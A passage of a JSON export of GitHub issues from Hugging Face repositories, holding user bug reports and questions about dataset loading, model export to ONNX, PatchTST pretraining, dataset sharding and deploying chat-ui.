ds = ds.with_format(\"tf\")\r\n>>> ds[0]\r\n{'data': }\r\n```\n\n### Environment info\n\ndatasets==2.19.1\r\ntorch==2.1.0\r\ntensorflow==2.13.1", "url": "https://github.com/huggingface/datasets/issues/6950", "state": "closed", "labels": [ "documentation" ], "created_at": "2024-06-04T09:18:32Z", "updated_at": "2024-06-25T08:05:49Z", "comments": 2, "user": "iansheng" }, { "repo": "huggingface/sentence-transformers", "number": 2708, "title": "What is the training order in the multi-task learning example?", "body": "hello. In the case of multi-task learning in the example below, what is the learning order? The example below is taken from https://www.sbert.net/examples/training/quora_duplicate_questions/README.html. \r\n\r\nRegarding the dataset below, I know that the learning results are good if you learn mnrl after learning the cl dataset. Does the learning proceed sequentially like this? Or does it go the other way? Simply put, which of the three below is your learning order?\r\n1. cl -> mnrl\r\n2. mnrl -> cl\r\n3. shuffled two datasets\r\n\r\n\r\n```\r\nMulti-Task-Learning\r\n\r\n[ContrastiveLoss]\r\n(https://www.sbert.net/docs/package_reference/sentence_transformer/losses.html#sentence_transformers.losses.ContrastiveLoss) works well for pair classification, i.e., given two pairs, are these duplicates or not. It pushes negative pairs far away in vector space, so that the distinguishing between duplicate and non-duplicate pairs works good.\r\n\r\n\r\n[MultipleNegativesRankingLoss]\r\n(https://www.sbert.net/docs/package_reference/sentence_transformer/losses.html#sentence_transformers.losses.MultipleNegativesRankingLoss) on the other sides mainly reduces the distance between positive pairs out of large set of possible candidates. However, the distance between non-duplicate questions is not so large, so that this loss does not work that well for pair classification.\r\n\r\nIn [training_multi-task-learning.py](https://github.com/UKPLab/sentence-transformers/tree/master/examples/training/quora_duplicate_questions/training_multi-task-learning.py) I demonstrate how we can train the network with both losses. The essential code is to define both losses and to pass it to the fit method.\r\n```\r\n\r\n```py\r\n\r\nfrom datasets import load_dataset\r\nfrom sentence_transformers.losses import ContrastiveLoss, MultipleNegativesRankingLoss\r\nfrom sentence_transformers import SentenceTransformerTrainer, SentenceTransformer\r\n\r\nmodel_name = \"stsb-distilbert-base\"\r\nmodel = SentenceTransformer(model_name)\r\n\r\n# https://huggingface.co/datasets/sentence-transformers/quora-duplicates\r\nmnrl_dataset = load_dataset(\r\n \"sentence-transformers/quora-duplicates\", \"triplet\", split=\"train\"\r\n) # The \"pair\" subset also works\r\nmnrl_train_dataset = mnrl_dataset.select(range(100000))\r\nmnrl_eval_dataset = mnrl_dataset.select(range(100000, 101000))\r\n\r\nmnrl_train_loss = MultipleNegativesRankingLoss(model=model)\r\n\r\n# https://huggingface.co/datasets/sentence-transformers/quora-duplicates\r\ncl_dataset = load_dataset(\"sentence-transformers/quora-duplicates\", \"pair-class\", split=\"train\")\r\ncl_train_dataset = cl_dataset.select(range(100000))\r\ncl_eval_dataset = cl_dataset.select(range(100000, 101000))\r\n\r\ncl_train_loss = ContrastiveLoss(model=model, margin=0.5)\r\n\r\n# Create the trainer & start training\r\ntrainer = SentenceTransformerTrainer(\r\n model=model,\r\n train_dataset={\r\n \"mnrl\": mnrl_train_dataset,\r\n \"cl\": cl_train_dataset,\r\n },\r\n eval_dataset={\r\n \"mnrl\": mnrl_eval_dataset,\r\n \"cl\": cl_eval_dataset,\r\n },\r\n loss={\r\n \"mnrl\": mnrl_train_loss,\r\n \"cl\": cl_train_loss,\r\n },\r\n)\r\ntrainer.train()\r\n\r\n```\r\n", "url": "https://github.com/huggingface/sentence-transformers/issues/2708", "state": "closed", "labels": [], "created_at": "2024-06-04T07:42:37Z", "updated_at": "2024-06-04T08:29:30Z", "user": "daegonYu" }, { "repo": "huggingface/datasets", "number": 6949, "title": "load_dataset error", "body": "### Describe the bug\n\nWhy does the program get stuck when I use load_dataset method, and it still gets stuck after loading for several hours? In fact, my json file is only 21m, and I can load it in one go using open('', 'r').\n\n### Steps to reproduce the bug\n\n1. pip install datasets==2.19.2\r\n2. from datasets import Dataset, DatasetDict, NamedSplit, Split, load_dataset\r\n3. data = load_dataset('json', data_files='train.json')\n\n### Expected behavior\n\nIt is able to load my json correctly\n\n### Environment info\n\ndatasets==2.19.2", "url": "https://github.com/huggingface/datasets/issues/6949", "state": "closed", "labels": [], "created_at": "2024-06-04T01:24:45Z", "updated_at": "2024-07-01T11:33:46Z", "comments": 2, "user": "frederichen01" }, { "repo": "huggingface/transformers.js", "number": 789, "title": "Can I use Xenova/Phi-3-mini-4k-instruct model server side?", "body": "### Question\n\nHey there! I\u2019m trying to run Xenova/Phi-3-mini-4k-instruct model using transformers.js 2.17.2 on the server in my Node.js project, but I get an error saying that Phi-3 is not supported. Can I make it work somehow? Any ideas appreciated", "url": "https://github.com/huggingface/transformers.js/issues/789", "state": "closed", "labels": [ "question" ], "created_at": "2024-06-03T18:43:20Z", "updated_at": "2024-06-04T04:57:42Z", "user": "StepanKukharskiy" }, { "repo": "huggingface/datasets", "number": 6947, "title": "FileNotFoundError\uff1aerror when loading C4 dataset", "body": "### Describe the bug\r\n\r\ncan't load c4 datasets\r\n\r\nWhen I replace the datasets package to 2.12.2 I get raise datasets.utils.info_utils.ExpectedMoreSplits: {'train'}\r\n\r\nHow can I fix this\uff1f\r\n\r\n### Steps to reproduce the bug\r\n\r\n1.from datasets import load_dataset\r\n2.dataset = load_dataset('allenai/c4', data_files={'validation': 'en/c4-validation.00003-of-00008.json.gz'}, split='validation')\r\n3. raise FileNotFoundError(\r\nFileNotFoundError: Couldn't find a dataset script at local_path/c4_val/allenai/c4/c4.py or any data file in the same directory. Couldn't find 'allenai/c4' on the Hugging Face Hub either: FileNotFoundError: Unable to find 'hf://datasets/allenai/c4@1588ec454efa1a09f29cd18ddd04fe05fc8653a2/en/c4-validation.00003-of-00008.json.gz' with any supported extension ['.csv', '.tsv', '.json', '.jsonl', '.parquet', '.geoparquet', '.gpq', '.arrow', '.txt', '.tar', '.blp', '.bmp', '.dib', '.bufr', '.cur', '.pcx', '.dcx', '.dds', '.ps', '.eps', '.fit', '.fits', '.fli', '.flc', '.ftc', '.ftu', '.gbr', '.gif', '.grib', '.h5', '.hdf', '.png', '.apng', '.jp2', '.j2k', '.jpc', '.jpf', '.jpx', '.j2c', '.icns', '.ico', '.im', '.iim', '.tif', '.tiff', '.jfif', '.jpe', '.jpg', '.jpeg', '.mpg', '.mpeg', '.msp', '.pcd', '.pxr', '.pbm', '.pgm', '.ppm', '.pnm', '.psd', '.bw', '.rgb', '.rgba', '.sgi', '.ras', '.tga', '.icb', '.vda', '.vst', '.webp', '.wmf', '.emf', '.xbm', '.xpm', '.BLP', '.BMP', '.DIB', '.BUFR', '.CUR', '.PCX', '.DCX', '.DDS', '.PS', '.EPS', '.FIT', '.FITS', '.FLI', '.FLC', '.FTC', '.FTU', '.GBR', '.GIF', '.GRIB', '.H5', '.HDF', '.PNG', '.APNG', '.JP2', '.J2K', '.JPC', '.JPF', '.JPX', '.J2C', '.ICNS', '.ICO', '.IM', '.IIM', '.TIF', '.TIFF', '.JFIF', '.JPE', '.JPG', '.JPEG', '.MPG', '.MPEG', '.MSP', '.PCD', '.PXR', '.PBM', '.PGM', '.PPM', '.PNM', '.PSD', '.BW', '.RGB', '.RGBA', '.SGI', '.RAS', '.TGA', '.ICB', '.VDA', '.VST', '.WEBP', '.WMF', '.EMF', '.XBM', '.XPM', '.aiff', '.au', '.avr', '.caf', '.flac', '.htk', '.svx', '.mat4', '.mat5', '.mpc2k', '.ogg', '.paf', '.pvf', '.raw', '.rf64', '.sd2', '.sds', '.ircam', '.voc', '.w64', '.wav', '.nist', '.wavex', '.wve', '.xi', '.mp3', '.opus', '.AIFF', '.AU', '.AVR', '.CAF', '.FLAC', '.HTK', '.SVX', '.MAT4', '.MAT5', '.MPC2K', '.OGG', '.PAF', '.PVF', '.RAW', '.RF64', '.SD2', '.SDS', '.IRCAM', '.VOC', '.W64', '.WAV', '.NIST', '.WAVEX', '.WVE', '.XI', '.MP3', '.OPUS', '.zip']\r\n### Expected behavior\r\n\r\n\r\nThe data was successfully imported\r\n\r\n### Environment info\r\n\r\npython version 3.9\r\ndatasets version 2.19.2", "url": "https://github.com/huggingface/datasets/issues/6947", "state": "closed", "labels": [], "created_at": "2024-06-03T13:06:33Z", "updated_at": "2024-06-25T06:21:28Z", "comments": 15, "user": "W-215" }, { "repo": "huggingface/dataset-viewer", "number": 2878, "title": "Remove or increase the 5GB limit?", "body": "The dataset viewer shows statistics and provides filter + sort + search only for the first 5GB of each split. We are also unable to provide the exact number of rows for bigger splits.\r\n\r\nNote that we \"show\" all the rows for parquet-native datasets (i.e., we can access the rows randomly, i.e., we have pagination).\r\n\r\nShould we provide a way to increase or remove this limit?", "url": "https://github.com/huggingface/dataset-viewer/issues/2878", "state": "closed", "labels": [ "question", "feature request" ], "created_at": "2024-06-03T08:55:08Z", "updated_at": "2024-07-22T11:32:49Z", "user": "severo" }, { "repo": "huggingface/transformers", "number": 31195, "title": "How to get back the input time series after using PatchTSTForPretraining?", "body": "### System Info\n\n-\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nMy model is PatchTSTForPretraining(\r\n (model): PatchTSTModel(\r\n (scaler): PatchTSTScaler(\r\n (scaler): PatchTSTStdScaler()\r\n )\r\n (patchifier): PatchTSTPatchify()\r\n (masking): PatchTSTMasking()\r\n (encoder): PatchTSTEncoder(\r\n (embedder): PatchTSTEmbedding(\r\n (input_embedding): Linear(in_features=5, out_features=768, bias=True)\r\n )\r\n (positional_encoder): PatchTSTPositionalEncoding(\r\n (positional_dropout): Identity()\r\n )\r\n (layers): ModuleList(\r\n (0-11): 12 x PatchTSTEncoderLayer(\r\n (self_attn): PatchTSTAttention(\r\n (k_proj): Linear(in_features=768, out_features=768, bias=True)\r\n (v_proj): Linear(in_features=768, out_features=768, bias=True)\r\n (q_proj): Linear(in_features=768, out_features=768, bias=True)\r\n (out_proj): Linear(in_features=768, out_features=768, bias=True)\r\n )\r\n (dropout_path1): Identity()\r\n (norm_sublayer1): PatchTSTBatchNorm(\r\n (batchnorm): BatchNorm1d(768, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\r\n )\r\n (ff): Sequential(\r\n (0): Linear(in_features=768, out_features=3072, bias=True)\r\n (1): GELUActivation()\r\n (2): Identity()\r\n (3): Linear(in_features=3072, out_features=768, bias=True)\r\n )\r\n (dropout_path3): Identity()\r\n (norm_sublayer3): PatchTSTBatchNorm(\r\n (batchnorm): BatchNorm1d(768, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\r\n )\r\n )\r\n )\r\n )\r\n )\r\n (head): PatchTSTMaskPretrainHead(\r\n (dropout): Dropout(p=0.0, inplace=False)\r\n (linear): Linear(in_features=768, out_features=5, bias=True)\r\n )\r\n)\r\n\r\nprediction_output = model(time_series_data)\r\n\r\nOutput:\r\n\r\ntime_series_data = tensor([[[430.3000],\r\n [431.7600],\r\n [431.7600],\r\n [431.7600],\r\n [431.7600],\r\n [431.7600],\r\n [431.7600],\r\n [431.7600],\r\n [431.7600],\r\n [430.3000],\r\n [430.3000],\r\n [428.9600],\r\n [430.3000],\r\n [430.3000],\r\n [430.3000]]], device='cuda:0')\r\nprediction_output = tensor([[[[-0.2321, 0.1897, 0.4731, 0.8893, 0.6723],\r\n [-0.5465, -0.9017, 0.0778, 0.0078, 1.3323],\r\n [ 0.4945, 0.5145, -0.5386, -0.7045, -1.5766],\r\n [ 0.2064, 0.6290, -0.8145, 1.0450, -0.2886]]]], device='cuda:0')\n\n### Expected behavior\n\nx_hat = self.head(model_output.last_hidden_state) produces output which is not consistent to the range of input time series values. I am trying to pretrain PatchTST for autoencoding. How do I get back the input time series?", "url": "https://github.com/huggingface/transformers/issues/31195", "state": "closed", "labels": [], "created_at": "2024-06-03T06:44:31Z", "updated_at": "2024-10-26T07:44:56Z", "user": "nikhilajoshy" }, { "repo": "huggingface/optimum", "number": 1885, "title": "onnx optimum ORTOptimizer inference runs slower than setfit.export_onnx runtime.InferenceSession inference", "body": "### System Info\r\n\r\nHi,\r\n\r\ni did a test between onnx optimum export + ORTOptimizer inference vs. setfit.export_onnx + onnxruntime.InferenceSession.\r\n\r\nit seems that onnx optimum ORTOptimizer inference runs slower than setfit.export_onnx runtime.InferenceSession inference\r\nany idea why is that the reason?\r\n\r\ni also changed from AutoOptimizationConfig.O2() =AutoOptimizationConfig.O4() - still onnxruntime.InferenceSession is faster.\r\n\r\nset train_model = True - to train the finetuned model before and export it.\r\ngpu: nvidia T4\r\n\r\noutput:\r\n```\r\npython setfit-onnx-optimum-example.py\r\nRepo card metadata block was not found. Setting CardData to empty.\r\nModel size (MB) - 86.68\r\nAccuracy on test set - 0.888\r\nAverage latency (ms) - 6.23 +\\- 0.51\r\nFramework not specified. Using pt to export the model.\r\nUsing the export variant default. Available variants are:\r\n - default: The default ONNX variant.\r\n\r\n***** Exporting submodel 1/1: BertModel *****\r\nUsing framework PyTorch: 2.2.1+cu121\r\nOverriding 1 configuration item(s)\r\n - use_cache -> False\r\n2024-06-02 22:27:53.640590789 [W:onnxruntime:, session_state.cc:1166 VerifyEachNodeIsAssignedToAnEp] Some nodes were not assigned to the preferred execution providers which may or may not have an negative impact on performance. e.g. ORT explicitly assigns shape related ops to CPU to improve perf.\r\n2024-06-02 22:27:53.640623671 [W:onnxruntime:, session_state.cc:1168 VerifyEachNodeIsAssignedToAnEp] Rerunning with verbose output on a non-minimal build will show node assignments.\r\n/home/zeus/miniconda3/envs/cloudspace/lib/python3.10/site-packages/optimum/onnxruntime/configuration.py:770: FutureWarning: disable_embed_layer_norm will be deprecated soon, use disable_embed_layer_norm_fusion instead, disable_embed_layer_norm_fusion is set to True.\r\n warnings.warn(\r\nOptimizing model...\r\nConfiguration saved in all-MiniLM-L6-v2_auto_opt_O2/ort_config.json\r\nOptimized model saved at: all-MiniLM-L6-v2_auto_opt_O2 (external data format: False; saved all tensor to one file: True)\r\n2024-06-02 22:27:55.548291362 [W:onnxruntime:, session_state.cc:1166 VerifyEachNodeIsAssignedToAnEp] Some nodes were not assigned to the preferred execution providers which may or may not have an negative impact on performance. e.g. ORT explicitly assigns shape related ops to CPU to improve perf.\r\n2024-06-02 22:27:55.548316947 [W:onnxruntime:, session_state.cc:1168 VerifyEachNodeIsAssignedToAnEp] Rerunning with verbose output on a non-minimal build will show node assignments.\r\nModel size (MB) - 86.10\r\nAccuracy on test set - 0.888\r\nAverage latency (ms) - 1.83 +\\- 0.46\r\nSpeedup: 3.40x\r\n2024-06-02 22:27:59.483816381 [W:onnxruntime:, transformer_memcpy.cc:74 ApplyImpl] 2 Memcpy nodes are added to the graph main_graph_ed6a60ecdb95455bac10d5392cf78d36 for CUDAExecutionProvider. It might have negative impact on performance (including unable to run CUDA graph). Set session_options.log_severity_level=1 to see the detail logs before this message.\r\n2024-06-02 22:27:59.485393795 [W:onnxruntime:, session_state.cc:1166 VerifyEachNodeIsAssignedToAnEp] Some nodes were not assigned to the preferred execution providers which may or may not have an negative impact on performance. e.g. ORT explicitly assigns shape related ops to CPU to improve perf.\r\n2024-06-02 22:27:59.485413289 [W:onnxruntime:, session_state.cc:1168 VerifyEachNodeIsAssignedToAnEp] Rerunning with verbose output on a non-minimal build will show node assignments.\r\nproviders: ['CUDAExecutionProvider', 'CPUExecutionProvider']\r\nModel size (MB) - 86.23\r\nAccuracy on test set - 0.888\r\nAverage latency (ms) - 1.40 +\\- 0.17\r\nSpeedup: 4.44x\r\n```\r\n\r\ncode:\r\n```\r\n# https://github.com/huggingface/setfit/blob/main/notebooks/setfit-onnx-optimum.ipynb\r\nfrom pathlib import Path\r\nfrom time import perf_counter\r\n\r\nimport evaluate\r\nimport numpy as np\r\nimport torch\r\nfrom tqdm.auto import tqdm\r\nimport os\r\n\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\nfrom setfit import SetFitModel\r\nfrom setfit import SetFitModel, Trainer, TrainingArguments\r\n\r\nfrom datasets import load_dataset\r\nfrom setfit.exporters.utils import mean_pooling\r\nfrom optimum.onnxruntime import ORTModelForFeatureExtraction, AutoOptimizationConfig, ORTOptimizer\r\nfrom transformers import AutoTokenizer\r\nfrom setfit.exporters.onnx import export_onnx\r\nimport onnxruntime\r\n\r\nmetric = evaluate.load(\"accuracy\")\r\ntrain_model = False\r\n\r\nclass PerformanceBenchmark:\r\n def __init__(self, model, dataset, optim_type):\r\n self.model = model\r\n self.dataset = dataset\r\n self.optim_type = optim_type\r\n\r\n def compute_accuracy(self):\r\n preds = self.model.predict(self.dataset[\"text\"])\r\n labels = self.dataset[\"label\"]\r\n accuracy = metric.compute(predictions=preds, references=labels)\r\n print(f\"Accuracy on test set - {accuracy['accuracy']:.3f}\")\r\n return accuracy\r\n\r\n def compute_size(self):\r\n state_dict = self.model.model_body.state_dict()\r\n tmp_path = Path(\"model.pt", "url": "https://github.com/huggingface/optimum/issues/1885", "state": "open", "labels": [ "bug" ], "created_at": "2024-06-02T22:34:37Z", "updated_at": "2024-06-08T03:02:40Z", "comments": 1, "user": "geraldstanje" }, { "repo": "huggingface/chat-ui", "number": 1241, "title": "\ud83d\udcbb\ud83d\udcbbHow to deploy to vercel", "body": "Hi,\r\n\r\nI am currently having troubles with deploying to Vercel, I am experiencing an error 404 NOT FOUND. I think i am using the wrong build command or the wrong default directory. Can someone please help?\r\n\r\n![image](https://github.com/huggingface/chat-ui/assets/115069692/2f5bea8e-4907-41db-9639-82b17902fc7e)\r\n\r\n\r\nThanksyou!", "url": "https://github.com/huggingface/chat-ui/issues/1241", "state": "open", "labels": [ "support" ], "created_at": "2024-06-02T10:05:45Z", "updated_at": "2025-01-10T17:00:37Z", "user": "haydenkong" }, { "repo": "huggingface/transformers.js", "number": 788, "title": "Is it possible to use transformers.js to implement audio source separation tasks?", "body": "### Question\n\nHello, I have a beginner's question.\r\n\r\nI want to implement the task of removing the human voice from the audio in the video and retaining the background sound in the browser. The idea is to load the model for audio source separation related to transformers.js to achieve the separation of the background sound and human voice, and then only return the background sound.\r\n\r\nBut I couldn't find relevant examples in the documentation, so I was wondering if this can be implemented? If so, what are the learning or research paths?\r\n\r\nLooking forward to your reply", "url": "https://github.com/huggingface/transformers.js/issues/788", "state": "open", "labels": [ "question" ], "created_at": "2024-06-02T04:00:55Z", "updated_at": "2024-12-26T06:05:26Z", "user": "asasas234" }, { "repo": "huggingface/lerobot", "number": 238, "title": "how to use on wslcan not visulize", "body": "how to use on wslcan not visulize", "url": "https://github.com/huggingface/lerobot/issues/238", "state": "closed", "labels": [ "simulation" ], "created_at": "2024-06-02T03:58:44Z", "updated_at": "2025-10-08T08:25:31Z", "user": "jackylee1" }, { "repo": "huggingface/chat-ui", "number": 1236, "title": "No Setup Deploy: Multiple models supported?", "body": "How can I make **multiple models** available on Chat UI using **No Setup Deploy**?\r\n\r\n## Further Details\r\n\r\nThe form (see below) seems to only allow one model.\r\n\r\n
Form\r\n

\r\n\r\n\"image\"\r\n\r\n

\r\n
\r\n\r\n## Tried so far\r\n\r\n(Without success)\r\n\r\n- I checked the [full tutorial](https://huggingface.co/docs/hub/spaces-sdks-docker-chatui#chatui-on-spaces) linked from the [README.md](https://github.com/huggingface/chat-ui/blob/93b39a0beb72378c76d5d146bfd3a8355c1d110d/README.md), but couldn't find neither how to use multiple models nor a note about a limitation. \r\n- I tried deploying one model and adding an `.env.local` to the deployment on my space, but the web interface threw an error when trying to commit `.env.local` due to potential secrets included in the file.", "url": "https://github.com/huggingface/chat-ui/issues/1236", "state": "open", "labels": [ "enhancement", "docker" ], "created_at": "2024-06-01T11:41:22Z", "updated_at": "2024-06-03T07:55:12Z", "comments": 1, "user": "rodrigobdz" }, { "repo": "huggingface/optimum", "number": 1884, "title": "Add support for porting CLIPVisionModelWithProjection", "body": "### Feature request\n\nCurrently there is not support for porting CLIPVisionModelWithProjection class models from the transformers library to onnx through optimum. I'd like to add support for the same for which we'd need to change the optimum/exporters/onnx/model_configs.py file. I'd like ot request you to help me guide how can I try to understand the code and make this feature.\n\n### Motivation\n\nI need the same for a personal project and would be happy to contribute to the library as well.\n\n### Your contribution\n\nI would be happy to submit a PR", "url": "https://github.com/huggingface/optimum/issues/1884", "state": "open", "labels": [ "feature-request", "onnx" ], "created_at": "2024-05-31T22:25:45Z", "updated_at": "2024-10-09T07:56:28Z", "comments": 0, "user": "mr-sarthakgupta" }, { "repo": "huggingface/datasets", "number": 6940, "title": "Enable Sharding to Equal Sized Shards", "body": "### Feature request\r\n\r\nAdd an option when sharding a dataset to have all shards the same size. Will be good to provide both an option of duplication, and by truncation.\r\n\r\n### Motivation\r\n\r\nCurrently the behavior of sharding is \"If n % i == l, then the first l shards will have length (n // i) + 1, and the remaining shards will have length (n // i).\". However, when using FSDP we want the shards to have the same size. This requires the user to manually handle this situation, but it will be nice if we had an option to shard the dataset into equally sized shards. \r\n\r\n### Your contribution\r\n\r\nFor now just a PR. I can also add code that does what is needed, but probably not efficient.\r\nShard to equal size by duplication:\r\n```\r\nremainder = len(dataset) % num_shards\r\nnum_missing_examples = num_shards - remainder\r\nduplicated = dataset.select(list(range(num_missing_examples)))\r\ndataset = concatenate_datasets([dataset, duplicated])\r\nshard = dataset.shard(num_shards, shard_idx)\r\n```\r\nOr by truncation:\r\n```\r\nshard = dataset.shard(num_shards, shard_idx)\r\nnum_examples_per_shard = len(dataset) // num_shards\r\nshard = shard.select(list(range(num_examples_per_shard)))\r\n```", "url": "https://github.com/huggingface/datasets/issues/6940", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-05-31T21:55:50Z", "updated_at": "2024-06-01T07:34:12Z", "comments": 0, "user": "yuvalkirstain" }, { "repo": "huggingface/chat-ui", "number": 1225, "title": "SyntaxError: JSON5: invalid character 'u' at 1:1", "body": "Where can I find out more about the following error? Is there an issue with the existing template?\r\n\r\n## Reproduction Steps\r\n\r\n1. Deploy [Chat UI using default template](https://huggingface.co/new-space?template=huggingchat/chat-ui-template) with `MONGO_URL` set to `mongodb+srv://:@`\r\n2. Add secret called `HF_TOKEN` with access token value.\r\n\r\n## Error Logs\r\n\r\nAdditionally to https://github.com/huggingface/chat-ui/issues/1174, the following error is shown:\r\n\r\n```\r\n2024-05-30T11:56:43: PM2 log: [--no-daemon] Exit on target PM2 exit pid=403\r\n11:56:43 2|index | You have triggered an unhandledRejection, you may have forgotten to catch a Promise rejection:\r\n11:56:43 2|index | SyntaxError: JSON5: invalid character 'u' at 1:1\r\n11:56:43 2|index | at syntaxError (/app/node_modules/json5/lib/parse.js:1110:17)\r\n11:56:43 2|index | at invalidChar (/app/node_modules/json5/lib/parse.js:1055:12)\r\n11:56:43 2|index | at Object.value (/app/node_modules/json5/lib/parse.js:309:15)\r\n11:56:43 2|index | at lex (/app/node_modules/json5/lib/parse.js:100:42)\r\n11:56:43 2|index | at Object.parse (/app/node_modules/json5/lib/parse.js:25:17)\r\n11:56:43 2|index | at file:///app/build/server/chunks/auth-9412170c.js:28:16\r\n11:56:43 2|index | at ModuleJob.run (node:internal/modules/esm/module_job:222:25)\r\n11:56:43 2|index | at async ModuleLoader.import (node:internal/modules/esm/loader:316:24)\r\n11:56:43 2|index | at async Server.init (file:///app/build/server/index.js:4189:24)\r\n11:56:43 2|index | at async file:///app/build/handler.js:1140:1\r\n```\r\n\r\n
Full error log\r\n

\r\n\r\n```\r\n===== Application Startup at 2024-05-30 09:52:12 =====\r\n\r\n2024-05-30T09:54:31.991512Z INFO text_generation_launcher: Args {\r\n model_id: \"mistralai/Mistral-7B-Instruct-v0.1\",\r\n revision: None,\r\n validation_workers: 2,\r\n sharded: None,\r\n num_shard: Some(\r\n 1,\r\n ),\r\n quantize: None,\r\n speculate: None,\r\n dtype: None,\r\n trust_remote_code: true,\r\n max_concurrent_requests: 128,\r\n max_best_of: 2,\r\n max_stop_sequences: 4,\r\n max_top_n_tokens: 5,\r\n max_input_tokens: None,\r\n max_input_length: None,\r\n max_total_tokens: None,\r\n waiting_served_ratio: 0.3,\r\n max_batch_prefill_tokens: None,\r\n max_batch_total_tokens: None,\r\n max_waiting_tokens: 20,\r\n max_batch_size: None,\r\n cuda_graphs: None,\r\n hostname: \"r-center-for-humans-and-machines-llm-stresstest-ubo8g-c2578-oc7\",\r\n port: 8080,\r\n shard_uds_path: \"/tmp/text-generation-server\",\r\n master_addr: \"localhost\",\r\n master_port: 29500,\r\n huggingface_hub_cache: Some(\r\n \"/data\",\r\n ),\r\n weights_cache_override: None,\r\n disable_custom_kernels: false,\r\n cuda_memory_fraction: 1.0,\r\n rope_scaling: None,\r\n rope_factor: None,\r\n json_output: false,\r\n otlp_endpoint: None,\r\n cors_allow_origin: [],\r\n watermark_gamma: None,\r\n watermark_delta: None,\r\n ngrok: false,\r\n ngrok_authtoken: None,\r\n ngrok_edge: None,\r\n tokenizer_config_path: None,\r\n disable_grammar_support: false,\r\n env: false,\r\n max_client_batch_size: 4,\r\n}\r\n2024-05-30T09:54:31.991620Z INFO hf_hub: Token file not found \"/home/user/.cache/huggingface/token\" \r\n2024-05-30T09:54:32.027992Z INFO text_generation_launcher: Default `max_input_tokens` to 4095\r\n2024-05-30T09:54:32.028013Z INFO text_generation_launcher: Default `max_total_tokens` to 4096\r\n2024-05-30T09:54:32.028016Z INFO text_generation_launcher: Default `max_batch_prefill_tokens` to 4145\r\n2024-05-30T09:54:32.028018Z INFO text_generation_launcher: Using default cuda graphs [1, 2, 4, 8, 16, 32]\r\n2024-05-30T09:54:32.028022Z WARN text_generation_launcher: `trust_remote_code` is set. Trusting that model `mistralai/Mistral-7B-Instruct-v0.1` do not contain malicious code.\r\n2024-05-30T09:54:32.028109Z INFO download: text_generation_launcher: Starting download process.\r\n{\"t\":{\"$date\":\"2024-05-30T11:54:32.245+02:00\"},\"s\":\"I\", \"c\":\"NETWORK\", \"id\":4915701, \"ctx\":\"main\",\"msg\":\"Initialized wire specification\",\"attr\":{\"spec\":{\"incomingExternalClient\":{\"minWireVersion\":0,\"maxWireVersion\":21},\"incomingInternalClient\":{\"minWireVersion\":0,\"maxWireVersion\":21},\"outgoing\":{\"minWireVersion\":6,\"maxWireVersion\":21},\"isInternalClient\":true}}}\r\n{\"t\":{\"$date\":\"2024-05-30T11:54:32.246+02:00\"},\"s\":\"I\", \"c\":\"CONTROL\", \"id\":23285, \"ctx\":\"main\",\"msg\":\"Automatically disabling TLS 1.0, to force-enable TLS 1.0 specify --sslDisabledProtocols 'none'\"}\r\n{\"t\":{\"$date\":\"2024-05-30T11:54:32.247+02:00\"},\"s\":\"I\", \"c\":\"NETWORK\", \"id\":4648601, \"ctx\":\"main\",\"msg\":\"Implicit TCP FastOpen unavailable. If TCP FastOpen is required, set tcpFastOpenServer, tcpFastOpenClient, and tcpFastOpenQueueSize.\"}\r\n{\"t\":{\"$date\":\"2024-05-30T11:54:32.248+02:00\"},\"s\":\"I\", \"c\":\"REPL\", \"id\":5123008, \"ctx\":\"main\",\"msg\":\"Successfully registered PrimaryOnlyService\",\"attr\":{\"service\":\"TenantMigrationDonorService\",\"", "url": "https://github.com/huggingface/chat-ui/issues/1225", "state": "open", "labels": [ "docker" ], "created_at": "2024-05-30T11:07:36Z", "updated_at": "2025-01-16T22:54:08Z", "comments": 8, "user": "rodrigobdz" }, { "repo": "huggingface/chat-ui", "number": 1221, "title": "500 Internal Server Error with chat-ui", "body": "I executed an inference server with the address http://192.168.0.185:7777/generate_stream using text-generation-inference (TGI) v.2.0.4. When executing commands with curl, the inference results are responding normally. For ease of use, I am going to use chat-ui. Below is the .env.local file's content of chat-ui. \r\n\r\n```\r\n$ vi .env.local\r\n 1 MONGODB_URL=mongodb://127.0.0.1:27017\r\n 2 HF_TOKEN=hf_***********************************\r\n 3 ALLOW_INSECURE_COOKIES=true\r\n 4 MODELS=`[\r\n 5 {\r\n 6 \"name\":\"samsung-codellama3-70b-custom\",\r\n 7 \"endpoints\":[{\"type\":\"tgi\",\"url\":\"http://192.168.0.185:7777/generate_stream\"}],\r\n 8 \"description\":\"A_Coding_Assistant_Model\",\r\n 9 \"userMessageToken\":\"<|prompter|>\",\r\n 10 \"assistantMessageToken\":\"<|assistant|>\",\r\n 11 \"messageEndToken\":\"\",\r\n 12 \"preprompt\":\"It_is_an_LLM-based_AI_assistant.\"',\r\n 13 \"parameters\":{\r\n 14 \"temperature\":0.2,\r\n 15 \"top_p\":0.9,\r\n 16 \"repetition_penalty\":1.2,\r\n 17 \"top_k\":10,\r\n 18 \"truncate\":1000,\r\n 19 \"max_new_tokens\":500\r\n 20 }\r\n 21 }\r\n 22 ]`\r\n```\r\n\r\n\r\nThen, I run `$ docker run -p 3000:3000 --env-file .env.local -v chat-ui:/data --name chat-ui ghcr.io/huggingface/chat-ui-db` command. Unfortunately, when I visited http://localhost:3000 with the MS Edge web browser, I got the error \u201c500: An error occurred\u201d as shown below. \r\n\r\n* Screenshot:\r\n![image](https://github.com/huggingface/chat-ui/assets/82404/6fec9357-8969-4b31-b657-a50bafad6114)\r\n\r\n* log message:\r\n`{\"level\":50,\"time\":1717033937576,\"pid\":30,\"hostname\":\"c5e9372bf1c1\",\"locals\":{\"sessionId\":\"f19bea94fb83ffe9b2aa5d9c3247d9dc1e819772e3b0b4557294cc9a7e884bf0\"},\"url\":\"http://localhost:3000/\",\"params\":{},\"request\":{},\"error\":{\"lineNumber\":1,\"columnNumber\":1},\"errorId\":\"7b3df79b-b4d0-4573-b92d-4ba0c182828b\"}`\r\n\r\nI am wondering what could be causing this error. Welcome to any hints to fix this issue.\r\n\r\n#### References\r\n* https://github.com/huggingface/chat-ui/issues?q=is%3Aissue+%22internal+server+error%22\r\n* 